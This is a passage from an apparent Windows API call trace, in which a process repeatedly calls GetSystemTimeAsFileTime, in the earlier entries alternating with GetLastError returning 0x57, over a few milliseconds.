lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetLastError () returned 0x57 [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.007] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.008] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) [0030.012] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2fe1d0, dwHighDateTime=0x1d4a418)) 